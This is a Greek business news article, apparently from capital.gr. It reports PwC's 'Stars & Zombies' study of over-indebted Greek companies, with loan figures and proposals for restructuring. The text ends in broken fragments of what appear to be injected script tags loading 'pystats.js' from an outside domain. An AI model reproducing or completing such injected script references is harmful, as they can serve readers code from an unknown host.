Οι “εταιρείες-ζόμπι” και η βόμβα στα θεμέλια της ανάπτυξηςΗ αναδιάρθρωση “προβληματικών” δανείων περίπου 15 δισ. ευρώ από 650 εταιρείες-zombies και η αναχρηματοδότηση περίπου 10 δισ. ευρώ άλλων 700 επιχειρήσεων προκειμένου να επανέλθει η συμβατότητα του δανεισμού με τη λειτουργική τους κερδοφορία είναι η μεγάλη πρόκληση που θα κληθεί να αντιμετωπίσει μέσα στους επόμενους μήνες το τραπεζικό σύστημα στην Ελλάδα. 

Από τον Νίκο Χρυσικόπουλο 

Ο χαρακτηρισμός εταιρεία-zombie που χρησιμοποιήθηκε σε πρόσφατο πρόσφατο δημοσίευμα της Wall Street Journal για τις ελληνικές ιχθυοκαλλιέργειες και την εταιρεία Νηρεύς και η απάντηση της εισηγμένης, επανέφεραν στο προσκήνιο την απόλυτη αναγκαιότητα αναδιάρθρωσης των μη βιώσιμων επιχειρήσεων προκειμένου να τροφοδοτηθεί η ανάπτυξη της οικονομίας. 

Η πρόσφατη έκθεση της PwC, “Stars & Zombies: Οι ελληνικές επιχειρήσεις βγαίνοντας από την κρίση”, αναδεικνύει με τον πλέον σαφή τρόπο πως οι προβληματικές αυτές επιχειρήσεις απορροφούν περισσότερους πόρους από ότι παράγουν και έχουν αρνητική επίδραση στις χρηματοροές του συνόλου των εταιρειών, ουσιαστικά διαδίδοντας (viral) την οικονομική πίεση και σε άλλες εταιρικές ομάδες.

Η PwC εξέτασε 2.950 επιχειρήσεις με έσοδα πάνω από 10 εκατ. ευρώ ετησίως κατά τη χρονική περίοδο 2008-2012. Οι επιχειρήσεις αυτές αντιπροσωπεύουν το 85% των εσόδων και το 67% του παγίου ενεργητικού του πληθυσμού των επιχειρήσεων στην Ελλάδα και περίπου το 25% του ΑΕΠ. Η PwC αξιολόγησε και κατέταξε τις επιχειρήσεις αυτές σε 10 κατηγορίες, από «Stars» έως και «Zombies», με κριτήρια τον μέσο όρο αύξησης του κύκλου εργασιών τους (2008-2012), την απόδοση των απασχολουμένων κεφαλαίων (ROCE) και τη δυνατότητα εξυπηρέτησης του χρέους. «Zombies» είναι οι εταιρείες που δεν μπορούν να εξυπηρετήσουν τα δάνειά τους και έχουν ζημιογόνες χρήσεις. 

Οι τελευταίες απαρτίζουν το 43% του συνολικού κύκλου εργασιών και το 55% των απασχολούμενων κεφαλαίων και το 72% του καθαρού δανεισμού. Πολύ κρίσιμο στοιχείο είναι πως στις εταιρείες αυτές βρίσκονται σχεδόν 213 χιλιάδες θέσεις εργασίας, περίπου 46% του συνόλου των εργαζομένων των εταιρειών που εξέτασε η Pwc. Σε ποιους τομείς εντοπίζονται οι περισσότερες προβληματικές και υπερδανεισμένες επιχειρήσεις; Στον κατασκευαστικό, τη ψυχαγωγία, τις τηλεπικοινωνίες, τις υπηρεσίες υγείας, τη βαριά βιομηχανία, τις επενδύσεις (χρηματοοικονομικός), το λιανεμπόριο και τον τουρισμό. Όπως σημειώνεται, στις εταιρείες με παγιδευμένο δανεισμό, θα πρέπει να αλλαχθεί σχεδόν ολοκληρωτικά ο πτωχευτικός κώδικας έτσι ώστε να είναι δυνατή η ταχεία ρευστοποίηση των πτωχευμένων εταιρειών και η αξιοποίηση των πάγιων περιουσιακών τους στοιχείων μέσα στην οικονομία. 

Ποια είναι, όμως, η συνολική εικόνα; Όπως προκύπτει από την έρευνα της PwC, το δείγμα αυτών των επιχειρήσεων έχει δάνεια 61,2 δισ. ευρώ, έναντι περίπου 116 δισ. ευρώ που είναι το σύνολο των επιχειρηματικών δανείων στην οικονομία. Συνολικά 427 εταιρείες (15% του συνόλου της έρευνας) έχουν ουσιώδη αδυναμία εξυπηρέτησης δανείων ύψους 15 δισ. ευρώ (25% του συνόλου δανείων). Ακόμη, 703 εταιρείες (24% του συνόλου εταιρειών) θα μπορούσαν ενδεχομένως να εξυπηρετήσουν μελλοντικά περίπου 9,7 δισ. ευρώ (16% του συνόλου δανείων) δανείων αν αναχρηματοδοτηθούν με την κατάλληλη μορφή, ενώ το 97% των παγιδευμένων δανείων βρίσκονται στις κατηγορίες Zombies. 

Τι προτείνεται 

Σύμφωνα με τη μελέτη της Pwc, η ελληνική εταιρική οικονομία πρέπει να ελαφρυνθεί από δανεισμό που δεν μπορεί να εξυπηρετηθεί, προκειμένου να επιταχύνει την ανάπτυξη, προσελκύοντας πρόσθετα νέα κεφάλαια. Περιουσιακά στοιχεία που είναι παγιδευμένα στους ισολογισμούς των τραπεζών και των εταιρειών πρέπει να απελευθερωθούν για να συμμετάσχουν στην αύξηση του δυναμικού της οικονομίας. Όπως αναφέρεται, αναδιαρθρώνοντας άμεσα κεφάλαια 15 δισ. ευρώ και μετατρέποντας σε κεφάλαια αυξημένου κινδύνου ακόμη 10 δισ. ευρώ, μπορεί να κινητοποιηθούν πρόσθετα περίπου 7 δισ. ευρώ και να αποδοθούν πίσω στην παραγωγή περιουσιακά στοιχεία 2 δισ. ευρώ. 

Ως αποτέλεσμα, η χρηματοδότηση και η αναχρηματοδότηση της εταιρικής οικονομίας θα δημιουργήσει ευκαιρίες εξαγορών και συγχωνεύσεων, ενώ η συνεπής προσέγγιση στην διευκόλυνση της ανάπτυξης της εταιρικής οικονομίας απ’ όλα τα εμπλεκόμενα μέρη (τράπεζες, εταιρείες, ΤτΕ, Κράτος) μπορεί να προσθέσει 0,7% – 1% στο ΑΕΠ ετησίως μέχρι το 2020.

Πηγή:www.capital.gr

challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >